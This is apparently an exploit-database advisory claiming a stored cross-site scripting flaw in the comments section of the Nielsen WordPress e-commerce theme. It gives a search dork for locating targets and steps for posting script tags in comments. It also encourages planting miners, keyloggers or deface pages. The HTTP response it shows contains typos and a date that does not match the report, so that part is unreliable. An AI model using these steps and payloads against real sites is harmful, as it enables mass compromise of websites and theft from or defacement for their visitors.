Nielsen Wordpress Theme Xss Stored Exploit

2018.04.14
ir GIST (IR) ir
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

################################################## # Title : Nielsen Wordpress Theme Xss Stored Exploit # Date : 14 April 2018 # Author : GIST # Version : 1.4.1 # Google Dork : inurl:/wp-content/themes/nielsen # Youtube : # Tested on : Ubuntu # Vendor : https://themeforest.net/item/nielsen-ecommerce-wordpress-theme/9710159 ################################################## Description : Nielsen is a truly user-oriented e-commerce theme, with a multiconcept layout and a lot of advanced features to enhance your shop. There are more than 4.000 website that installed this theme. You Can Put Your Javascripts Code and Run it on website or you can Inject Your scripts (Miner or Keylogger) Xss : First Open Enter Google Dork And open Your target. then open an post and go to Comments section Then Put your script and post it. Request Method : Post -- response -- HTTP/1.1 200OK Server nginx/1.4.6 (Ubuntu) Date: Thu, 10 mar 2016 19:18:47 GMT Content-Type: text/html Transfer-Encoding: Chunked Connection: close Vary: Accept-Encoding X-Powered-By: PHP/5.5.9-1ubuntu4.14 Expires: Thu, 19 Nov 1981 08:51:00 GMT Cache-Control: no=store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragme: no-cache Content-encoing: gzip commands : <script>alert('Xss')</script> or "><script>alert('Xss')</script> or Enter Your Deface Page Source


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2018, cxsecurity.com

 

Back to Top